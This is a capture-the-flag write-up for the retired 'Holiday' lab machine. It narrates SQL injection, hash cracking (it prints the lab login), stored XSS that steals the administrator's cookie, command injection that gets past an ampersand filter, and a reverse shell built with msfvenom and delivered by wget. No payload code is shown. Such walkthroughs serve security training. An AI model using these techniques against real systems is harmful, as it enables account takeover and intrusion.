Today we’re going to solve another CTF machine “Holiday”. It is now retired box and can be accessible if you’re a VIP member.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP Node.js
  • IP Address: 10.10.10.25
  • Difficulty: Brainfuck

Weakness

  • Obtaining data with stored XSS
  • Exploiting NOPASSWD files

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

Enumerate Directories

We have a HTTP service running on port 8000.

Let’s run directory enumerating tools to find some hidden directories.

We found an /admin path which was redirecting 302 to /login. Now that we have a login field we can test brute force or SQL injection.

SQLMap

Let’s use SQLMap first and see if it’s vulnerable to SQL injection. We’re gonna capture POST data using burp and save it to sqlmap.req

Now run SQLMap.

I used rockyou.txt to crack the hashes but unfortunately we’re not able to crack password.

But let’s test some online crackers such as crackstation.

And using crackstation we’re able to crack the md5 hash.

RickA:nevergonnagiveyouup

After login we can see bunch of information contains names, reference numbers and UUIDs.

We have the ability to view bookings and add notes to the bookings. Something that caught my eye is the following text on the “Add Note” page:

There’s some kind of a manual reviewing system by administrator. This should make us think of XSS attacks.

Our goal here is to get “admin” browser to make a web request to us with all of the information we can possible send.

Example:

http://jdstiles.com/java/cct.html

Convert this into CharCode

After submitting XSS code we have to listen on our port.

And we got some response including administrator cookie which we can use to bypass admin login.

Since we have the administrator cookie we can inject and try navigating to /admin directory.

We were successful with it and now we have two options Bookings and Notes.

Bookings page contains RCE.

Note%26 instead of & is required because & is filtered

Now we’re gonna create a payload using msfvenom.

And now we’re gonna run python http server to upload our shell using wget command and start listening to our payload.

We have to convert our IP to decimal in order to upload our shell.

https://www.browserling.com/tools/ip-to-dec

And finally got user shell.

Privilege Escalation

Now we move forward to get root. We can use scripts to collect some information or we can do some research manually first which i do most of the time.

This is what LinEnum.sh found